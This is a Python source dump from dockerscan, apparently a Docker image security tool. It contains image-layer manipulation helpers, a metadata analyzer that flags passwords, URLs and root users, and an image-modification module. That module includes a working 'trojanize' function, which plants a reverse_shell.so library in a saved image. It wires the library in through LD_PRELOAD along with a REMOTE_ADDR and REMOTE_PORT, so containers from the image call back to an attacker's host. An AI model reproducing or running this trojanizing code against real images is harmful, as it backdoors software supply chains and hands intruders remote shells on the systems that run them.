242 | >>> build_image_layer_from_dir("new_layer", "/tmp/new_layer/")
243 | "/tmp/new_layer/new_layer.tar", "076538d7e850181c3cccbdbce3a0811698efad376e2c99a72a203493739c2bf2"
244 | """
245 | if "tar" not in layer_name:
246 | layer_name = "{}.tar".format(layer_name)
247 |
248 | # Build new layer
249 | log.info(" > Building new {} layer image".format(layer_name))
250 |
251 | new_layer_path = os.path.join(source_dir, layer_name)
252 | with tarfile.open(new_layer_path, "w") as nl:
253 | nl.add(source_dir, arcname="/")
254 |
255 | # Calculating the digest
256 | log.info(" > Calculating new SHA256 hash for the new layer")
257 |
258 | with open(new_layer_path, "rb") as f:
259 | m = hashlib.sha256()
260 | m.update(f.read())
261 | new_layer_sha256 = m.hexdigest()
262 |
263 | return new_layer_path, new_layer_sha256
264 |
265 |
266 | def build_manifest_with_new_layer(old_manifest: dict,
267 | old_layer_digest: str,
268 | new_layer_digest: str) -> dict:
269 | """
270 | Build a new manifest with the information of new layer and return the new
271 | manifest object
272 |
273 | :return: JSON with the new manifest
274 | """
275 | log.info(" > Updating the manifest")
276 |
277 | new_manifest = old_manifest.copy()
278 |
279 | for i, layer_id in enumerate(old_manifest[0]["Layers"]):
280 | if old_layer_digest in layer_id:
281 | new_manifest[0]["Layers"][i] = "{}/layer.tar" \
282 | "".format(new_layer_digest)
283 | break
284 |
285 | return new_manifest
286 |
287 |
288 | def read_file_from_image(img: tarfile.TarFile,
289 | file_path: str,
290 | autoclose=False) -> bytes:
291 | if autoclose:
292 | with closing(img.extractfile(file_path)) as fd:
293 | return fd.read()
294 | else:
295 | return img.extractfile(file_path).read()
296 |
297 |
298 | def replace_or_append_file_to_layer(file_to_replace: str,
299 | content_or_path: bytes,
300 | img: tarfile.TarFile):
301 | # Is content or path?
302 | if not os.path.exists(content_or_path):
303 |
304 | # Is a content
305 | t = tarfile.TarInfo(file_to_replace)
306 | t.size = len(content_or_path)
307 | img.addfile(t, io.BytesIO(content_or_path))
308 |
309 | else:
310 | # Is a path
311 | img.add(content_or_path, file_to_replace)
312 |
313 |
314 | def add_new_file_to_image(file_to_append: str,
315 | path_in_image: str,
316 | image_path: str):
317 | file_to_append = os.path.abspath(file_to_append)
318 |
319 | with tempfile.NamedTemporaryFile() as tmp_out_image:
320 |
321 | with open_docker_image(image_path) as (
322 | img, top_layer, _, manifest):
323 |
324 | # 1 - Get the last layer in manifest
325 | old_layer_digest = get_last_image_layer(manifest)
326 |
327 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
328 |
329 | # 2 - Copying new info
330 | copy_file_to_image_folder(d,
331 | file_to_append,
332 | path_in_image)
333 |
334 | new_layer_path, new_layer_digest = \
335 | build_image_layer_from_dir("new_layer.tar", d)
336 |
337 | # 3 - Updating the manifest
338 | new_manifest = build_manifest_with_new_layer(manifest,
339 | old_layer_digest,
340 | new_layer_digest)
341 |
342 | # 4 - Create new docker image
343 | create_new_docker_image(new_manifest,
344 | tmp_out_image.name,
345 | img,
346 | old_layer_digest,
347 | new_layer_path,
348 | new_layer_digest)
349 |
350 | # Replace old image with the new
351 | shutil.copy(tmp_out_image.name,
352 | image_path)
353 |
354 |
355 | def _update_json_values(update_points: list,
356 | values: Union[dict, str]):
357 |
358 | for point in update_points:
359 | if isinstance(values, dict):
360 | for var_name, var_value in values.items():
361 | point.append("{}={}".format(
362 | var_name,
363 | var_value
364 | ))
365 | elif isinstance(values, (str, bytes)):
366 | if hasattr(values, "decode"):
367 | values = values.decode()
368 | setattr(point, values)
369 |
370 |
371 | def update_layer_environment_vars(json_info: dict,
372 | new_environment_vars: dict) -> dict:
373 |
374 | new_json_info = json_info.copy()
375 |
376 | update_points = [
377 | new_json_info["config"]["Env"],
378 | new_json_info["container_config"]["Env"]
379 | ]
380 |
381 | for point in update_points:
382 | for var_name, var_value in new_environment_vars.items():
383 | point.append("{}={}".format(
384 | var_name,
385 | var_value
386 | ))
387 |
388 | return new_json_info
389 |
390 |
391 | def update_layer_user(json_info: dict,
392 | new_user: str) -> dict:
393 |
394 | new_json_info = json_info.copy()
395 |
396 | update_points = [
397 | new_json_info["config"],
398 | new_json_info["container_config"]
399 | ]
400 |
401 | for point in update_points:
402 | point["User"] = new_user
403 |
404 | return new_json_info
405 |
406 |
407 | def update_layer_entry_point(json_info: dict,
408 | new_cmd: str) -> dict:
409 |
410 | new_json_info = json_info.copy()
411 |
412 | update_points = [
413 | new_json_info["config"],
414 | new_json_info["container_config"]
415 | ]
416 |
417 | for point in update_points:
418 | point["Entrypoint"] = new_cmd
419 |
420 | return new_json_info
421 |
422 |
423 | def create_new_docker_image(manifest: dict,
424 | image_output_path: str,
425 | img: tarfile.TarFile,
426 | old_layer_digest: str,
427 | new_layer_path: str,
428 | new_layer_digest: str,
429 | json_metadata_last_layer: dict = None,
430 | json_metadata_root: dict = None):
431 | with tarfile.open(image_output_path, "w") as s:
432 |
433 | for f in img.getmembers():
434 | log.debug(" _> Processing file: {}".format(f.name))
435 |
436 | # Add new manifest
437 | if f.name == "manifest.json":
438 | # Dump Manifest to JSON
439 | new_manifest_json = json.dumps(manifest).encode()
440 | replace_or_append_file_to_layer("manifest.json",
441 | new_manifest_json,
442 | s)
443 |
444 | #
445 | # NEW LAYER INFO
446 | #
447 | elif old_layer_digest in f.name:
448 |             # Replace the old layer.tar file with the new layer
449 | if f.name == "{}/layer.tar".format(old_layer_digest) or \
450 | "/" not in f.name:
451 |
452 | log.debug(
453 | " _> Replacing layer {} by {}".format(
454 | f.name,
455 | new_layer_digest
456 | ))
457 |
458 | replace_or_append_file_to_layer("{}/layer.tar".format(
459 | new_layer_digest),
460 | new_layer_path,
461 | s)
462 | else:
463 | #
464 | # Extra files: "json" and "VERSION"
465 | #
466 | c = read_file_from_image(img, f.name)
467 |
468 | if "json" in f.name:
469 | # Modify the JSON content to add the new
470 | # hash
471 | if json_metadata_last_layer:
472 | c = json.dumps(json_metadata_last_layer).encode()
473 | else:
474 | c = c.decode().replace(old_layer_digest,
475 | new_layer_digest).encode()
476 |
477 | replace_or_append_file_to_layer("{}/{}".format(
478 | new_layer_digest,
479 | os.path.basename(f.name)), c, s)
480 |
481 | #
482 | # Root .json file with the global info
483 | #
484 | elif "repositories" in f.name:
485 | c = read_file_from_image(img, f, autoclose=False)
486 | j = json.loads(c.decode())
487 |
488 | image = list(j.keys())[0]
489 | tag = list(j[image].keys())[0]
490 |
491 | # Update the latest layer
492 | j[image][tag] = new_layer_digest
493 |
494 | new_c = json.dumps(j).encode()
495 |
496 | replace_or_append_file_to_layer(f.name, new_c, s)
497 |
498 | elif ".json" in f.name and "/" not in f.name:
499 | c = read_file_from_image(img, f, autoclose=False)
500 |
501 | # Modify the JSON content to add the new
502 | # hash
503 | if json_metadata_root:
504 | j = json_metadata_root
505 | else:
506 | j = json.loads(c.decode())
507 |
508 | j["rootfs"]["diff_ids"][-1] = \
509 | "sha256:{}".format(new_layer_digest)
510 |
511 | new_c = json.dumps(j).encode()
512 |
513 | replace_or_append_file_to_layer(f.name, new_c, s)
514 |
515 | # Add the rest of files / dirs
516 | else:
517 | s.addfile(f, img.extractfile(f))
518 |
519 |
520 | def get_root_json_from_image(img: tarfile.TarFile) -> Tuple[str, dict]:
521 | """
522 | Every docker image has a root .json file with the metadata information.
523 |     This function locates this file, loads it and returns its content and
524 |     its name
525 | 
526 |     >>> get_root_json_from_image(img)
527 | ('db079554b4d2f7c65c4df3adae88cb72d051c8c3b8613eb44e86f60c945b1ca7', dict(...))
528 | """
529 | for f in img.getmembers():
530 | if f.name.endswith("json") and "/" not in f.name:
531 | c = img.extractfile(f.name).read()
532 | if hasattr(c, "decode"):
533 | c = c.decode()
534 |
535 | return f.name.split(".")[0], json.loads(c)
536 |
537 | return None, None
538 |
539 |
540 | def get_file_path_from_img(image_content_dir: str,
541 | image_file_path: str) -> str:
542 |
543 | if image_file_path.startswith("/"):
544 | image_file_path = image_file_path[1:]
545 |
546 | return os.path.join(image_content_dir, image_file_path)
547 |
548 |
549 | def copy_file_to_image_folder(image_content_dir: str,
550 | src_file: str,
551 | dst_file: str) -> str:
552 |
553 | if dst_file.startswith("/"):
554 | dst_file = dst_file[1:]
555 |
556 | remote_path = os.path.join(image_content_dir, dst_file)
557 | remote_dir = os.path.dirname(remote_path)
558 |
559 | if not os.path.exists(remote_dir):
560 | os.makedirs(remote_dir)
561 |
562 | shutil.copy(src_file,
563 | remote_path)
564 |
565 |
566 | def get_layers_ids_from_manifest(manifest: dict) -> List[str]:
567 | try:
568 | return [x.split("/")[0] for x in manifest[0]["Layers"]]
569 |
570 | except (IndexError, KeyError):
571 | raise DockerscanError("Invalid manifest")
572 |
573 |
574 | def extract_docker_layer(img: tarfile.TarFile,
575 | layer_id: str,
576 | extract_path: str):
577 | with tarfile.open(fileobj=img.extractfile('%s/layer.tar' % layer_id),
578 | errorlevel=0,
579 | dereference=True) as layer:
580 |
581 | layer.extractall(path=extract_path)
582 |
583 | log.debug('processing whiteouts')
584 | for member in layer.getmembers():
585 | path = member.path
586 | if path.startswith('.wh.') or '/.wh.' in path:
587 | if path.startswith('.wh.'):
588 | newpath = path[4:]
589 | else:
590 | newpath = path.replace('/.wh.', '/')
591 |
592 | try:
593 | log.debug('removing path %s', newpath)
594 | os.unlink(path)
595 | os.unlink(newpath)
596 | except OSError as err:
597 | if err.errno != errno.ENOENT:
598 | raise
599 |
600 |
601 | def extract_docker_image(image_path: str,
602 | extract_path: str):
603 | """Extract a docker image content to a path location"""
604 | if not os.path.exists(image_path):
605 |         raise DockerscanNotExitsError("Docker image does not exist at path: {}". \
606 | format(image_path))
607 |
608 | with open_docker_image(image_path) as (img, first_layer, _, _):
609 | layers = list(_find_layers(img, first_layer))
610 |
611 | if not os.path.isdir(extract_path):
612 | os.makedirs(extract_path)
613 |
614 | for layer_id in reversed(layers):
615 | log.debug('extracting layer %s', layer_id)
616 |
617 | extract_docker_layer(img, layer_id, extract_path)
618 |
619 |
620 | def resolve_text_var_from_metadata_vars(text: str,
621 | image_metadata: dict) -> str:
622 | if "$" not in text:
623 | return text
624 |
625 | # Extract var name
626 | REGEX_EXTRACT_ENV_VAR = re.compile(r'''(\$[{]*[\w]+[}]*)''')
627 | REGEX_EXTRACT_ENV_VAR_NAME = re.compile(r'''(\$[{]*)([\w]+)([}]*)''')
628 |
629 | var_name_mark = REGEX_EXTRACT_ENV_VAR.search(text).group(1)
630 | var_name = REGEX_EXTRACT_ENV_VAR_NAME.search(var_name_mark).group(2)
631 |
632 | # Get image metadata vars
633 | image_metadata_environ = set()
634 | image_metadata_environ.update(image_metadata["config"]["Env"])
635 | image_metadata_environ.update(image_metadata["container_config"]["Env"])
636 |
637 | # Search in environment vars
638 | for env in image_metadata_environ:
639 | env_name, env_value = env.split("=", maxsplit=1)
640 |
641 | if var_name in env_name:
642 | text = text.replace(var_name_mark,
643 | env_value)
644 | break
645 |
646 | return text
647 |
648 |
649 | def get_entry_point_from_image_metadata(image_metadata: dict) -> str:
650 | # Build the launching command
651 | entrypoint = image_metadata["config"]["Entrypoint"]
652 |
653 | if type(entrypoint) is list:
654 | entrypoint = " ".join(entrypoint)
655 |
656 | # Locate the entry-point
657 | cmd = image_metadata["config"]["Cmd"]
658 | if type(cmd) is list:
659 | cmd = " ".join(cmd)
660 |
661 | if entrypoint and cmd:
662 | start_point = "{} {}".format(entrypoint, cmd)
663 | elif entrypoint and not cmd:
664 | start_point = entrypoint
665 | elif not entrypoint and cmd:
666 | start_point = cmd
667 | else:
668 | start_point = ""
669 |
670 | raw_start_point = start_point.strip()
671 |
672 | # replace environment vars, like ${HOME} in entry point
673 | return resolve_text_var_from_metadata_vars(raw_start_point,
674 | image_metadata)
675 |
676 |
677 | def get_docker_image_layers(image_path: str) -> dict:
678 | """
679 |     This function gets the docker image layers and yields them
680 |
681 | >>> for x in get_docker_image_layers("/path/image.tar"):
682 | print(x)
683 | """
684 | with open_docker_image(image_path) as (img, top_layers, _, _):
685 | layers_meta = _find_metadata_in_layers(img, top_layers)
686 |
687 | for layer in layers_meta:
688 | yield layer
689 |
690 |
691 | __all__ = ("open_docker_image", "extract_layer_in_tmp_dir",
692 | "get_last_image_layer", "get_docker_image_layers",
693 | "build_image_layer_from_dir", "build_manifest_with_new_layer",
694 | "get_file_path_from_img", "copy_file_to_image_folder",
695 | "extract_docker_image", "extract_docker_layer",
696 | "create_new_docker_image",
697 |            "get_layers_ids_from_manifest",
698 | "update_layer_environment_vars", "get_root_json_from_image",
699 | "read_file_from_image", "update_layer_user",
700 | "modify_docker_image_metadata",
701 | "get_entry_point_from_image_metadata",
702 | "resolve_text_var_from_metadata_vars",
703 | "replace_or_append_file_to_layer",
704 | "update_layer_entry_point",
705 | "add_new_file_to_image")
--------------------------------------------------------------------------------
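A minimal sketch that chains the helpers above to inspect the top layer of a saved image; the image path is a placeholder and the archive is assumed to contain the usual manifest.json and repositories files:

    import os

    from dockerscan.actions.image.docker_api import (
        open_docker_image,
        get_last_image_layer,
        extract_layer_in_tmp_dir,
    )

    # Open the saved image, locate its last layer and list that layer's files.
    with open_docker_image("nginx.tar") as (img, top_layer, tags, manifest):
        last_layer_digest = get_last_image_layer(manifest)

        with extract_layer_in_tmp_dir(img, last_layer_digest) as layer_dir:
            for root, _, files in os.walk(layer_dir):
                for name in files:
                    print(os.path.join(root, name))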
/dockerscan/actions/image/image_analyzer.py:
--------------------------------------------------------------------------------
1 | import re
2 | import string
3 |
4 | from collections import defaultdict
5 |
6 | from .model import DockerImageInfo
7 |
8 | PASSWORD_KEYWORDS = (
9 | "pwd",
10 |     "passwd",
11 |     "password",
12 |     "cred",
13 |     "credential",
14 |     "auth"
15 | )
16 |
17 | REGEX_URN = re.compile(r'[a-z\-]{0,6}://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
18 | REGEX_IPV6 = re.compile(r'''(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,6}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}\Z)|(\A([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}\Z)|(\A([0-9a-f]{1,4}:){1,6}(:[0-9a-f]{1,4}){1,1}\Z)|(\A(([0-9a-f]{1,4}:){1,7}|:):\Z)|(\A:(:[0-9a-f]{1,4}){1,7}\Z)|(\A((([0-9a-f]{1,4}:){6})(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A(([0-9a-f]{1,4}:){5}[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3})\Z)|(\A([0-9a-f]{1,4}:){5}:[0-9a-f]{1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,1}(:[0-9a-f]{1,4}){1,4}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,3}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,2}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,1}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A(([0-9a-f]{1,4}:){1,5}|:):(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)|(\A:(:[0-9a-f]{1,4}){1,5}:(25[0-5]|2[0-4]\d|[0-1]?\d?\d)(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\Z)''')
19 | REGEX_IPV4 = re.compile(r'''((([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}'''
20 |                         r'''([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])) ''')
21 | REGEX_EXTRACT_ENV_VAR = re.compile(r'''(\$[{]*[\w]+[}]*)''')
22 | REGEX_EXTRACT_ENV_VAR_NAME = re.compile(r'''(\$[{]*)([\w]+)([}]*)''')
23 |
24 |
25 | class DockerImageAnalysisResults:
26 | PASSWORD = "password"
27 | URN = "URL-IP"
28 |
29 | def __init__(self):
30 | self.running_user = ""
31 | self.sensitive_data = defaultdict(dict)
32 | self.warnings = defaultdict(set)
33 |
34 | def add_user(self, user_name):
35 | # if image_info.user == "" or image_info.working_dir == "/root":
36 | # results.add_user("root")
37 | if not self.running_user:
38 | self.running_user = user_name
39 | elif self.running_user != "root" and user_name != "root":
40 | self.running_user = user_name
41 |
42 | def add_sensitive(self, sensitive_data_type, location, data):
43 | assert sensitive_data_type in (self.PASSWORD, self.URN)
44 |
45 | try:
46 | d = self.sensitive_data[sensitive_data_type][location]
47 | d.add(data)
48 | except KeyError:
49 | self.sensitive_data[sensitive_data_type][location] = set()
50 | self.sensitive_data[sensitive_data_type][location].add(data)
51 |
52 | def add_warning(self, location, message):
53 | self.warnings[location].add(message)
54 |
55 |
56 | def _replace_bash_vars_in_string(text: str, image_metadata: list) -> str:
57 | # Extract var name
58 | var_name_mark = REGEX_EXTRACT_ENV_VAR.search(text).group(1)
59 | var_name = REGEX_EXTRACT_ENV_VAR_NAME.search(var_name_mark).group(2)
60 |
61 | # Search in environment vars
62 | for env in image_metadata:
63 | env_name, env_value = env.split("=", maxsplit=1)
64 |
65 | if var_name in env_name:
66 | text = text.replace(var_name_mark,
67 | env_value)
68 | break
69 | return text
70 |
71 |
72 | # --------------------------------------------------------------------------
73 | # Content helpers function
74 | # --------------------------------------------------------------------------
75 | def _build_start_point(image_metadata) -> str:
76 | # Build the launching command
77 | entrypoint = image_metadata.entry_point
78 |
79 | if type(entrypoint) is list:
80 | entrypoint = " ".join(entrypoint)
81 |
82 | # Locate the entry-point
83 | cmd = image_metadata.cmd
84 | if image_metadata.cmd:
85 | if type(image_metadata.cmd) is list:
86 | cmd = " ".join(image_metadata.cmd)
87 |
88 | if entrypoint and cmd:
89 | start_point = "{} {}".format(entrypoint, cmd)
90 | elif entrypoint and not cmd:
91 | start_point = entrypoint
92 | elif not entrypoint and cmd:
93 | start_point = cmd
94 | else:
95 | start_point = ""
96 |
97 | return start_point.strip()
98 |
99 |
100 | def _find_user_in_start_point(image_location: str,
101 | start_point: str,
102 | image_metadata: DockerImageInfo) -> str:
103 | launch_command = start_point
104 |
105 | is_binary = False
106 | # If start point is a shell script, then open it
107 | if launch_command.endswith("sh"):
108 | _shell_path = start_point[start_point.rfind(" ") + 1:]
109 | _shell_location = "{}/{}".format(image_location,
110 | _shell_path)
111 |
112 | # Clean
113 | _shell_location = _shell_location.replace("//", "/")
114 |
115 | # If command has any environment var -> replace it
116 | if "$" in _shell_location:
117 | _shell_location = _replace_bash_vars_in_string(
118 | _shell_location,
119 | image_metadata.environment)
120 |
121 | # Clean
122 | _shell_location = _shell_location.replace("//", "/")
123 |
124 | # Check if _shell is a binary file
125 | is_binary = open(_shell_location,
126 | "r",
127 |                          errors="ignore").read(1) not in string.printable
128 | if not is_binary:
129 | launch_command = open(_shell_location, "r", errors="ignore").read()
130 |
131 | #
132 | # Try to find "sudo" or "gosu" or "su -c '...'"
133 | #
134 | SUDO_PATTERNS = ("sudo", "gosu", "su -c")
135 | if not is_binary:
136 |         for pattern in SUDO_PATTERNS:
137 |             if pattern in launch_command:
138 |                 return "non-root"
139 | 
140 |         return "root"
141 | else:
142 | return "root"
143 |
144 |
145 | def _find_domains_and_ips_in_text(text) -> str:
146 | ipv4 = REGEX_IPV4.search(text)
147 | if ipv4:
148 | return text[ipv4.start():ipv4.end()]
149 |
150 | ipv6 = REGEX_IPV6.search(text)
151 | if ipv6:
152 | return text[ipv6.start():ipv6.end()]
153 |
154 | urn = REGEX_URN.search(text)
155 | if urn:
156 | return text[urn.start():urn.end()]
157 |
158 | return ""
159 |
160 |
161 | def _find_password_in_text(text):
162 | for k in PASSWORD_KEYWORDS:
163 | if k in text:
164 | return True
165 | return False
166 |
167 |
168 | # --------------------------------------------------------------------------
169 | # Public API
170 | # --------------------------------------------------------------------------
171 | def search_in_metadata(image_info: DockerImageInfo,
172 | results: DockerImageAnalysisResults):
173 | """
174 | Search sensitive information in metadata:
175 |
176 |     - Passwords in environment vars
177 |     - Whether the image runs as root
178 |     - Excessive exposed ports
179 | """
180 |
181 |     # Try to find passwords in environment vars
182 | for env in image_info.environment:
183 | if _find_password_in_text(env):
184 | results.add_sensitive(DockerImageAnalysisResults.PASSWORD,
185 | "environment_var",
186 | env)
187 |
188 | urn = _find_domains_and_ips_in_text(env)
189 | if urn:
190 | results.add_sensitive(DockerImageAnalysisResults.URN,
191 | "environment_var",
192 | urn)
193 |
194 |     # Try to check if the image is running as root
195 | if image_info.user:
196 | results.add_user(image_info.user)
197 |
198 | # Many ports exposed?
199 | if len(image_info.exposed_ports) > 4:
200 | results.add_warning("exposed_ports",
201 |                             "Docker image has more than 4 exposed ports")
202 |
203 |
204 | def search_in_content(image_location: str,
205 | image_metadata: DockerImageInfo,
206 | results: DockerImageAnalysisResults):
207 |
208 | start_point = _build_start_point(image_metadata)
209 |
210 | user = _find_user_in_start_point(image_location,
211 | start_point,
212 | image_metadata)
213 |
214 | results.add_user(user)
215 |
216 |
217 | def analyze_docker_image(image_extracted_location: str,
218 | image_info: DockerImageInfo) -> \
219 | DockerImageAnalysisResults:
220 |
221 | results = DockerImageAnalysisResults()
222 |
223 | # Search in metadata
224 | search_in_metadata(image_info, results)
225 |
226 | # Search in content
227 | search_in_content(image_extracted_location,
228 | image_info,
229 | results)
230 |
231 | return results
232 |
233 |
234 | __all__ = ("analyze_docker_image", "search_in_content", "search_in_metadata")
235 |
--------------------------------------------------------------------------------
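A minimal sketch of feeding the analyzer by hand; the layer metadata and the extraction path are illustrative assumptions (normally they come from the docker_api helpers):

    from dockerscan.actions.image.model import DockerImageInfo
    from dockerscan.actions.image.image_analyzer import analyze_docker_image

    info = DockerImageInfo()
    info.add_layer_info({
        "container": "abc123",  # marks this as the last layer
        "config": {
            "Env": ["db_password=s3cr3t", "API=http://10.0.0.1:8080"],
            "Entrypoint": ["/entrypoint.sh"],
            "Cmd": ["nginx", "-g", "daemon off;"],
        },
    })

    # "/tmp/extracted-image" is a placeholder for an extracted image directory.
    results = analyze_docker_image("/tmp/extracted-image", info)
    print(results.running_user)           # e.g. 'root'
    print(dict(results.sensitive_data))   # flagged passwords and URLs/IPs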
/dockerscan/actions/image/model.py:
--------------------------------------------------------------------------------
1 | from collections import defaultdict
2 |
3 | from dockerscan import SharedConfig, String
4 |
5 |
6 | class DockerImageInfoModel(SharedConfig):
7 | image_path = String()
8 |
9 |
10 | class DockerImageAnalyzeModel(SharedConfig):
11 | image_path = String()
12 |
13 |
14 | class DockerImageExtractModel(SharedConfig):
15 | image_path = String()
16 | extract_path = String()
17 |
18 |
19 | class DockerImageInfo:
20 |
21 | def __init__(self):
22 | self.author = ""
23 | self.host_name = ""
24 | self.entry_point = ""
25 | self.working_dir = ""
26 | self.created_date = ""
27 | self.docker_version = ""
28 | self.cmd = ""
29 | self.labels = []
30 | self.environment = []
31 | self.user = ""
32 |
33 |         #: dict of exposed ports, e.g.:
34 |         #: { PORT_NO: {"TCP", "UDP"} }
35 | self.exposed_ports = defaultdict(set)
36 |
37 | def add_layer_info(self, layer_info: dict):
38 | # Get container config
39 | # container_config = layer_info.get("container_config", None)
40 | container_config = layer_info.get("config", None)
41 |
42 | if container_config:
43 | basic_info = {
44 | "Hostname": "host_name",
45 | "WorkingDir": "working_dir",
46 | "Entrypoint": "entry_point",
47 | "User": "user"
48 | }
49 | list_info = {
50 | "Env": "environment",
51 | "Labels": "labels"
52 | }
53 |
54 | for json_prop, class_prop in basic_info.items():
55 | json_value = container_config.get(json_prop)
56 | if json_value:
57 | setattr(self, class_prop, json_value)
58 |
59 | for json_prop, class_prop in list_info.items():
60 | json_value = container_config.get(json_prop)
61 | if json_value:
62 | class_value = getattr(self, class_prop)
63 | class_value.extend(json_value)
64 |
65 | if container_config.get("Cmd", None):
66 | # Get only the Cmd Command of the last layer
67 | if "container" in layer_info:
68 | self.cmd = " ".join(container_config.get("Cmd"))
69 |
70 | # Add exposed ports
71 | if container_config.get("ExposedPorts"):
72 | for port in container_config.get("ExposedPorts").keys():
73 | port, proto = port.split("/")
74 |
75 | self.exposed_ports[port].add(proto)
76 |
77 |         # Only store the date for the last layer. Only the last layer
78 |         # contains the "container" property
79 | if layer_info.get("container", None):
80 | self.created_date = layer_info.get("created")
81 |
82 | if layer_info.get("author"):
83 | self.author = layer_info.get("author")
84 |
85 | if layer_info.get("docker_version"):
86 | self.docker_version = layer_info.get("docker_version")
87 |
88 |
89 | __all__ = ("DockerImageInfoModel", "DockerImageInfo",
90 | "DockerImageExtractModel", "DockerImageAnalyzeModel",)
91 |
--------------------------------------------------------------------------------
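A minimal sketch of how add_layer_info folds a layer's config block into the summary object; the values are illustrative assumptions:

    from dockerscan.actions.image.model import DockerImageInfo

    info = DockerImageInfo()
    info.add_layer_info({
        "config": {
            "Hostname": "c0ffee",
            "WorkingDir": "/app",
            "Env": ["PATH=/usr/local/sbin:/usr/local/bin"],
            "ExposedPorts": {"80/tcp": {}, "443/tcp": {}},
        },
    })

    print(info.host_name)             # 'c0ffee'
    print(info.working_dir)           # '/app'
    print(dict(info.exposed_ports))   # {'80': {'tcp'}, '443': {'tcp'}}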
/dockerscan/actions/image/modifiers/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/api.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os.path
3 | import logging
4 | from contextlib import contextmanager
5 |
6 | from dockerscan import DockerscanReturnContextManager
7 | from .model import *
8 | from ..docker_api import *
9 |
10 | log = logging.getLogger("dockerscan")
11 |
12 | REMOTE_SHELL_PATH = "/usr/share/lib/reverse_shell.so"
13 |
14 |
15 | def run_image_modify_trojanize_dockerscan(
16 | config: DockerImageInfoModifyTrojanizeModel):
17 |
18 | assert isinstance(config, DockerImageInfoModifyTrojanizeModel)
19 |
20 | output_docker_image = config.output_image
21 | image_path = config.image_path
22 |
23 | if not output_docker_image:
24 | output_docker_image = os.path.basename(config.image_path)
25 |
26 | if not output_docker_image.endswith("tar"):
27 | output_docker_image += ".tar"
28 |
29 |     # Choose the shell
30 | if not config.custom_shell:
31 | SHELL_PATH = os.path.join(os.path.dirname(__file__),
32 | "shells",
33 | "reverse_shell.so")
34 | else:
35 | SHELL_PATH = os.path.abspath(config.custom_shell)
36 |
37 | # 1 - Get layers info
38 | log.debug(" > Opening docker file")
39 | with open_docker_image(image_path) as (
40 | img, top_layer, _, manifest):
41 |
42 | # 2 - Get the last layer in manifest
43 | old_layer_digest = get_last_image_layer(manifest)
44 | log.debug(" > Last layer: {}".format(old_layer_digest))
45 |
46 | with extract_layer_in_tmp_dir(img, old_layer_digest) as d:
47 |
48 | # Start trojanizing
49 |             log.info(" > Starting trojanizing process")
50 |
51 | # 3 - Copy the shell
52 |             log.info(" > Copying the shell: 'reverse_shell.so' "
53 | "to '{}'".format(REMOTE_SHELL_PATH))
54 |
55 | copy_file_to_image_folder(d,
56 | SHELL_PATH,
57 | REMOTE_SHELL_PATH)
58 |
59 | new_layer_path, new_layer_digest = \
60 | build_image_layer_from_dir("new_layer.tar", d)
61 |
62 | # 5 - Updating the manifest
63 | new_manifest = build_manifest_with_new_layer(manifest,
64 | old_layer_digest,
65 | new_layer_digest)
66 |
67 |             # Add new environment vars with LD_PRELOAD and REMOTE_ADDR
68 | json_info_last_layer = read_file_from_image(img,
69 | "{}/json".format(
70 | old_layer_digest))
71 |
72 | json_info_last_layer = json.loads(json_info_last_layer.decode())
73 |
74 | new_env_vars = {
75 | "LD_PRELOAD": REMOTE_SHELL_PATH,
76 | "REMOTE_ADDR": config.remote_addr,
77 | "REMOTE_PORT": config.remote_port
78 | }
79 |
80 | new_json_data_last_layer = update_layer_environment_vars(
81 | json_info_last_layer,
82 | new_env_vars
83 | )
84 |
85 | _, json_info_root_layer = get_root_json_from_image(img)
86 | new_json_info_root_layer = update_layer_environment_vars(
87 | json_info_root_layer,
88 | new_env_vars
89 | )
90 |
91 | # 6 - Create new docker image
92 | log.info(" > Creating new docker image")
93 | create_new_docker_image(new_manifest,
94 | output_docker_image,
95 | img,
96 | old_layer_digest,
97 | new_layer_path,
98 | new_layer_digest,
99 | new_json_data_last_layer,
100 | new_json_info_root_layer)
101 |
102 |
103 | def run_image_modify_user_dockerscan(
104 | config: DockerImageInfoModifyUserModel):
105 |
106 | assert isinstance(config, DockerImageInfoModifyUserModel)
107 |
108 | output_docker_image = config.output_image
109 | image_path = config.image_path
110 |
111 | if not output_docker_image:
112 | output_docker_image = os.path.basename(config.image_path)
113 |
114 | if not output_docker_image.endswith("tar"):
115 | output_docker_image += ".tar"
116 |
